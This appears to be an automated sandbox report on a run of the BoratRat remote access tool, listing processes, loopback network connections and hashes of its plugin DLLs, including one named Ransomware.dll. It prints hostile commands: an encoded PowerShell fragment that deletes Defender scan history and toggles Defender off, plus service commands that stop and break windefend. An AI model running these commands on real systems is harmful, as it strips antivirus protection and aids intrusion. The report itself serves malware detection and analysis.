EAYgBsAGUAUwBlAHIAdgBpAGMAZQAnACAALQB3AGkAbgAgADEACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABtAHAAZQBuAGcAaQBuAGUAZABiAC4AZABiACcAKQAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwACAAIAAgACAAIAAgACAAIAAgACAAIAAjACMAIABDAG8AbQBtAGUAbgB0AGUAZAAgAD0AIABrAGUAZQBwACAAcwBjAGEAbgAgAGgAaQBzAHQAbwByAHkACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABIAGkAcwB0AG8AcgB5AFwAUwBlAHIAdgBpAGMAZQAnACkAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAKACcAQAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwADsAIABpAGUAeAAoACgAZwBwACAAUgBlAGcAaQBzAHQAcgB5ADoAOgBIAEsARQBZAF8AVQBzAGUAcgBzAFwAUwAtADEALQA1AC0AMgAxACoAXABWAG8AbABhAHQAaQBsAGUAKgAgAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAgAC0AZQBhACAAMAApAFsAMABdAC4AVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACkACgAjAC0AXwAtACMA
C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" qc windefend
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
C:\Windows\system32\whoami.exe
"C:\Windows\system32\whoami.exe" /groups
C:\Windows\system32\net1.exe
"C:\Windows\system32\net1.exe" start TrustedInstaller
C:\Windows\system32\net1.exe
"C:\Windows\system32\net1.exe" start lsass
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" qc windefend
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
C:\Windows\system32\whoami.exe
"C:\Windows\system32\whoami.exe" /groups
C:\Windows\system32\net1.exe
"C:\Windows\system32\net1.exe" stop windefend
C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe"
C:\Users\Admin\Desktop\Borat\Client.exe
"C:\Users\Admin\Desktop\Borat\Client.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\CloseConvertTo.xhtml
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe8b923cb8,0x7ffe8b923cc8,0x7ffe8b923cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1968,7431071974769138954,13518475369368192271,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1980 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1968,7431071974769138954,13518475369368192271,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1968,7431071974769138954,13518475369368192271,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2556 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,7431071974769138954,13518475369368192271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3164 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,7431071974769138954,13518475369368192271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\GetMeasure.mhtml
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffe8b923cb8,0x7ffe8b923cc8,0x7ffe8b923cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1936 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2512 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4976 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5008 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5232 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5228 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3012 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3012 /prefetch:1
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files (x86)\Windows Media Player\wmplayer.exe
"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Play -Embedding
C:\Program Files (x86)\Windows Media Player\setup_wm.exe
"C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Play -Embedding
C:\Windows\SysWOW64\unregmp2.exe
"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
C:\Windows\system32\unregmp2.exe
"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT
C:\Windows\system32\msinfo32.exe
"C:\Windows\system32\msinfo32.exe" "C:\Users\Admin\Desktop\DebugFind.nfo"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\READ-ME-NOW.txt
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Users\Admin\Desktop\DECRYPT.exe
"C:\Users\Admin\Desktop\DECRYPT.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
Network
| Country | Destination | Domain | Proto |
| US | 52.111.227.13:443 | tcp | |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| N/A | 127.0.0.1:8848 | tcp | |
| N/A | 127.0.0.1:8848 | tcp | |
| N/A | 127.0.0.1:8848 | tcp | |
| N/A | 127.0.0.1:8848 | tcp | |
| N/A | 127.0.0.1:8848 | tcp | |
| N/A | 127.0.0.1:8848 | tcp | |
| N/A | 127.0.0.1:8848 | tcp | |
| N/A | 127.0.0.1:8848 | tcp | |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp |
Files
C:\Users\Admin\Desktop\Borat\BoratRat.exe
| MD5 | 65b694d69d327efe28fcbce125401e96 |
| SHA1 | 049d4d71742b99a598c074458f1f2d5b0119e912 |
| SHA256 | de60ecbbfef30c93fe8875ef69b358b20076d1f969fc3d21ab44d59dc9ef7cab |
| SHA512 | 7ab57642e414e134e851d9aa2ed3ef8b483f3a5f77877cdc04e08d7f95c44884f8ccc6beaf8ba7f6949cfd7398c46be46c024d4fdeacd3a332d4565609baad5b |
C:\Users\Admin\Desktop\Borat\BoratRat.exe.config
| MD5 | 3e645ccca1c44a00210924a3b0780955 |
| SHA1 | 5d8e8115489ac505c1d10fdd64e494e512dba793 |
| SHA256 | f29e697efd7c5ecb928c0310ea832325bf6518786c8e1585e1b85cdc8701602f |
| SHA512 | ea7e3a6e476345870f05124a56dde266e1ad04b557b2dde83c5674cfdf3be00f26d3db6a14a8d88ecf75e2c9e3a12e6955f6c85654ba967c17664e9acc3d4f1f |
memory/3008-59-0x000001F3848E0000-0x000001F385CEA000-memory.dmp
C:\Users\Admin\Desktop\Borat\ServerCertificate.p12
| MD5 | 478ee44a47895e687296b9ab34df04c4 |
| SHA1 | 4b81e94f3d3a99cc01d5c57bd5bec8317f0aca4f |
| SHA256 | 4b0612b2cd5e7ecc456d5c29c89917b8ec881c5f4fd94afe157098ca96308781 |
| SHA512 | 28c0635f1e5062fcdef783aceaa8aa53531f18ce66d4aed62a99ec5b31a364e0d0d36fa237d978d75f51a859a7140d31e62aed340eae4aa769e02d1640e30c7b |
memory/3008-67-0x000001F3A35B0000-0x000001F3A3656000-memory.dmp
C:\Users\Admin\AppData\Local\Server\BoratRat.exe_Url_lrgptkwgygy0ckkeksopg3divcheuvku\1.0.7.0\user.config
| MD5 | 0c6e4f57ebaba0cc4acfc8bb65c589f8 |
| SHA1 | 8c021c2371b87f2570d226b419c64c3102b8d434 |
| SHA256 | a9539ba4eae9035b2ff715f0e755aa772b499d72ccab23af2bf5a2dc2bcfa41c |
| SHA512 | c6b877ff887d029e29bf35f53006b8c84704f73b74c616bf97696d06c6ef237dff85269bdf8dfb432457b031dd52410e2b883fd86c3f54b09f0a072a689a08c0 |
C:\Users\Admin\AppData\Local\Server\BoratRat.exe_Url_lrgptkwgygy0ckkeksopg3divcheuvku\1.0.7.0\user.config
| MD5 | acb6df8bd0fe9236ea87ea6e3c28173f |
| SHA1 | 8b1d88bd749b58905c6db258e7224a67d1179938 |
| SHA256 | ec2b3fc4d011e9b8a04188d8f2ff280de854dde7d6ebf8e871e0642f789dfa5b |
| SHA512 | a4222c0f5aeba58679c21361dcb6ab2c7ed1d9cae41d2839089fdb7bbaac3b8735afff8b302557f85389daa977b826cee77b944ba598e3fa6c2a16781453a832 |
C:\Users\Admin\Desktop\Borat\Client.exe
| MD5 | 85177d29b7da7cb2c5d45a63705cbf75 |
| SHA1 | 096a6622cab5be82bac79efecafb22618809bc10 |
| SHA256 | 6cfc9e4a6192301441cee5a2c6433d61eaf7dab765365364092e0e4830570e7f |
| SHA512 | 5e3c800e3ad305a1cc5771230c822478d81fa94f2354b000bb38e3c3768f50eab0cd217eed1672d6e5c81f399b9713569c18af8541ff9109c7b269a178e2d0f5 |
memory/1220-96-0x0000000000D30000-0x0000000000D44000-memory.dmp
C:\Users\Admin\Desktop\Borat\bin\Extra.dll
| MD5 | 62c231bafa469ab04f090fcb4475d360 |
| SHA1 | 82dda56bc59ac7db05eddbe4bcf0fe9323e32073 |
| SHA256 | 6a4f32b0228092ce68e8448c6f4b74b4c654f40fb2d462c1d6bbd4b4ef09053d |
| SHA512 | 515fbdc9e792bd7ab711261c1d0185351079a2d5b104211c559cfc4c8465794ef897c43f0f825b4fc2e97a56525f73c3ad0a28de0fcf8b8bff89c26d1c97b3cc |
C:\Users\Admin\Desktop\Borat\bin\Audio.dll
| MD5 | 9726d7fe49c8ba43845ad8e5e2802bb8 |
| SHA1 | 8bcdf790826a2ac7adfc1e8b214e8de43e086b97 |
| SHA256 | df31a70ceb0c481646eeaf94189242200fafd3df92f8b3ec97c0d0670f0e2259 |
| SHA512 | f97bc1e2ecbbc979d0eea3559c2da0982e4617eb217603224263ef825b8d98b3c52392eeef41888e6295fb60d362f9521e2f2bdaccc762c4591565f9e6248658 |
C:\Users\Admin\Desktop\Borat\bin\Discord.dll
| MD5 | 7ee673594bbb20f65448aab05f1361d0 |
| SHA1 | 2a29736882439ef4c9088913e7905c0408cb2443 |
| SHA256 | 8fa7634b7dca1a451cf8940429be6ad2440821ed04d5d70b6e727e5968e0b5f6 |
| SHA512 | f5d8457279a5c0684c075eae2d3de62b672303520a1c725b4f97787961e6043c73ca68d4353e5d4168a427104be65b74a9c92a87419348e92d772368e94fab7c |
memory/1220-104-0x000000001B970000-0x000000001B9E6000-memory.dmp
memory/1220-105-0x00000000015F0000-0x00000000015FE000-memory.dmp
memory/1220-106-0x0000000002F20000-0x0000000002F3E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qqvskjgl.n0x.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4804-112-0x000001A0C8C10000-0x000001A0C8C32000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | aa0a32b11dca7b04f4cc5fe8c55cb357 |
| SHA1 | 00e354fd0754a7d721a270cdc08f970b9a3f6605 |
| SHA256 | e336a593bd31921c46757a88a99759f6a33854d0c8b854c0c8f118e5cede1ea1 |
| SHA512 | 1db91d3540da2c7eb4e151d698f3a9c1d2caed3161c41f1c2c73781a65e9dfc818902f0220c0aa9fc2c617d4851f23f4a576c4e5fe0f40ec78e9ed01c8ad8b30 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1e6e1eefe52266028bfa762c897b8e42 |
| SHA1 | 04055d0d63018302918e1e1d4a0a2949f500f5d1 |
| SHA256 | 356061c3465ca4897bb4848fc68ab931d2eca5b37a8f8180f709417ea992622a |
| SHA512 | cf8cd23c2b4736792439e155f06b514cef1c91b87356e929b69679366fd2e9e5d8866904788dd738ca05ce6fe8eb8e341d1d8d637ff1dde81cfe50be3567b1e5 |
C:\Users\Admin\Desktop\Borat\bin\Ransomware.dll
| MD5 | ef998529d037fcdb2bde6d046f99db45 |
| SHA1 | 1a38a1182155429ecc64c20ece46ec0836c32ec7 |
| SHA256 | 54f554b9e330476b3903756f62b577bab35cdef941d3d0f6a3d607862762bf91 |
| SHA512 | 4e4376c182dcdf993c6e8f55388829b9e7057e8d80be268a8469721e8ac7fc29eab65681f0f7f2c0dbad1c5bc30fdcc123774ae543770090bf01a62a0d161ece |
C:\Users\Admin\Desktop\Borat\bin\FileManager.dll
| MD5 | 4ccd3dfb14ffdddfa598d1096f0190ea |
| SHA1 | c68c30355599461aca7205a7cbdb3bb1830d59c8 |
| SHA256 | 7f8a306826fcb0ee985a2b6d874c805f7f9b2062a1123ea4bb7f1eba90fc1b81 |
| SHA512 | 2fa3ea13054d84e1a307ddc63f2a364c760b8e1882fee975585e6e1bae41cad3463495d22d0c8fb77d40e6b0336c3537ab68efb5fd84e46063a336ba20672cbc |
C:\Users\Admin\Desktop\Borat\bin\FileSearcher.dll
| MD5 | 0b7c33c5739903ba4f4b78c446773528 |
| SHA1 | b58555bebddf8e695880014d34a863a647da547e |
| SHA256 | 2d9625f41793f62bfe32c10b2d5e05668e321bcaf8b73414b3c31ef677b9bff4 |
| SHA512 | d3ea78dcc15e5f365df55558b911f3289f516ecb16c07b7132084ec2e3b10f496d1ef0774416775c14caffbf3107220cfc19ec910cdb2637561b12a23fd1e43f |
C:\Users\Admin\Desktop\Borat\bin\Miscellaneous.dll
| MD5 | 509d41da4a688a2e50fc8e3afca074c7 |
| SHA1 | 228de17938071733585842c59ffb99177831b558 |
| SHA256 | f91973113fd01465999ce317f3e7a89df8c91a5efadcfa61e5ccce687bf3580a |
| SHA512 | 86f975c75e246100d0486aa1507f5c2030323649ae921af51583c6b287e6780e9a9bf887ef4ead11599742cdeb7c90380c7d4859340e11913c2c1f42fb34ef8e |
C:\Users\Admin\Desktop\Borat\bin\Options.dll
| MD5 | 3a474b8dee059562b31887197d94f382 |
| SHA1 | b31455f9583b89cac9f655c136801673fb7b4b9a |
| SHA256 | c9b8e795c5a024f9e3c85ba64534b9bf52cc8c3d29b95ff6417dc3a54bc68b95 |
| SHA512 | cdda908adb88603302b33c99befed0394f12cc34c5a31bc7b4b614df3615ea8a6cad7ef84e7b9865342f33783006974027e39fd458e5936dec14c8ae5e98bf0a |
C:\Users\Admin\Desktop\Borat\bin\ProcessManager.dll
| MD5 | 91edcb945924df5fbf4ff123aa63199c |
| SHA1 | d124869aaee9aa1a49def714774b834335aa746e |
| SHA256 | 5b1f80ff787bdcd7ee12aa64be1f2f5f1f658bd644bbc5fd73527b51da6ce0d6 |
| SHA512 | 6927c1576a8a9ff724fe3b7d53067f97c121b272c1f2528cb8aa1806de61f36504ee4d25d56eb717a1010a80fb6b5e37c1a0c30b256fdb9a5ba5b31794146c52 |
C:\Users\Admin\Desktop\Borat\bin\Netstat.dll
| MD5 | 12911f5654d6346fe99ef91e90849c13 |
| SHA1 | 1b8e63d03feb84d995c02dcbb74da7edfaa8c763 |
| SHA256 | 7eed1b90946a6db1fe978d177a80542b5db0bf3156c979dc8a8869a94811bf4b |
| SHA512 | 588971ef7aebae7afffb22bafdf8f8bb04bf3c474eabf6637543fe42e3e1800cc824929d953055a4f666776ea5fffe0389ef6216c1dca437e0c8a330f6670c19 |
memory/1220-143-0x000000001D860000-0x000000001D87E000-memory.dmp
C:\Users\Admin\Desktop\Borat\bin\MessagePackLib.dll
| MD5 | 590b00c87d5ff2ffe09079f0406eb2cd |
| SHA1 | 92c91f1db8c2c8cc34c2e1a26f4f970f1518a7ed |
| SHA256 | adb00dee751b4ba620d3b0e002f5b6d8b89cf63b062f74ec65bba72294d553d1 |
| SHA512 | 9396620bb9d77cacd7bc2bfa44e8fb76091e314298434d8ba995595df0b2a13edf8229c465b563aa668702176ccf2de34e9fd3d1567d4ff20d94672aba4ad745 |
C:\Users\Admin\Desktop\Borat\bin\Information.dll
| MD5 | 87651b12453131dafd3e91f60d8aef5a |
| SHA1 | d5db880256bffa098718894edf684ea0dc4c335d |
| SHA256 | a15d72d990686d06d89d7e11df2b16bcd5719a40298c19d046fa22c40d56af44 |
| SHA512 | 1b911a877c5a3f508421f4f250d95861a5c110cb4b67ffe05de157085c5a018d34d9574c1ef4cf9eec3ba3cdd39985863564ea2f77814812032ea796cb329afa |
C:\Users\Admin\Desktop\Borat\bin\Fun.dll
| MD5 | 499fc6ac30b3b342833c79523be4a60c |
| SHA1 | dcf1ed3fbc56d63b42c88ede88f9cad1d509e7ec |
| SHA256 | dcac599b1bab37e1a388ac469e6cc5de1f35eb02beaa6778f07a1c090ce3ea04 |
| SHA512 | b63dcf0f42a4e80747556000aeee72137735cb7177567df6cfef3f15471efb8c4dc797db8cdc870d66cd87f09ffc7ab177969b126825a69e4b5390b568462484 |
C:\Users\Admin\Desktop\Borat\bin\Logger.dll
| MD5 | 872145b37d107144894c9aa8729bad42 |
| SHA1 | 01610587bcfa7ac379b1f0169a2a9ab384b9116b |
| SHA256 | 2f258949fd95da6cd912beb7203a9fd5e99d050309a40341de67537edb75aadc |
| SHA512 | 0c926d24515b8ea80586c80d2613136f802badde3a788d2960ebd8f6a4d6e901d1ea220262f3d2a852c4f3da88bd69915070de920bc79eb82329c44dcab98435 |
C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\Microsoft.DiaSymReader.Native.amd64.dll
| MD5 | 2357652c6dcc1032766c4ea8bd6bda3f |
| SHA1 | 7b6c5a1a2f31b861499940b85edd5594776a9f70 |
| SHA256 | 0ff2b3aae686b88cbb7fcedf7a8b7081138da7cba529f5af3b25b342d10b0274 |
| SHA512 | e4d9317636ee634f4d965a623c819b716df557514dcaa5212e7da5941a3e425933590f1732cc694f3b9be3067002d270b04d29ff4ff280bcae865caef55a029f |
C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\D3DCompiler_47_cor3.dll
| MD5 | 181634ec3a738b9f68210a635d211481 |
| SHA1 | 097cd307dce3b1c2118b240f2c8bb0c483810aef |
| SHA256 | 465c86e72445fa291da87493bcc2e5bb15330a0b7e9829b0dd8f581a3d6f1c9e |
| SHA512 | 14893e76163edd8a72fd4071544a3c6e3e009b91bdd049d11d49ed64b17600bb866b8bd7c886f95e29204263cf556d5d91e94e0489b5f297b6c500fa44d50827 |
C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\vcruntime140_cor3.dll
| MD5 | 84f936958175c14285de2a4ce27ec9c6 |
| SHA1 | fe313889da818ca94fd07d5e555249894c17a27b |
| SHA256 | f2c0ed88cabd45f9cea4a471f76f782ebfd18f77c1841d30d2a087e4968415a6 |
| SHA512 | e88fb2def83cad8108a9c27816f57805c3d0a0c442d2a857ea5164f2393f044ee1abb66f564f54bb25662de5a7320023f3f537f80983a60656c5e03f09614114 |
memory/2128-3463-0x0000026377380000-0x0000026377381000-memory.dmp
memory/2128-3462-0x0000026377380000-0x0000026377381000-memory.dmp
memory/2128-3464-0x0000026377380000-0x0000026377381000-memory.dmp
memory/2128-3471-0x0000026377380000-0x0000026377381000-memory.dmp
memory/2128-3473-0x0000026377380000-0x0000026377381000-memory.dmp
memory/2128-3469-0x0000026377380000-0x0000026377381000-memory.dmp
memory/2128-3468-0x0000026377380000-0x0000026377381000-memory.dmp
memory/2128-3474-0x0000026377380000-0x0000026377381000-memory.dmp
memory/2128-3472-0x0000026377380000-0x0000026377381000-memory.dmp
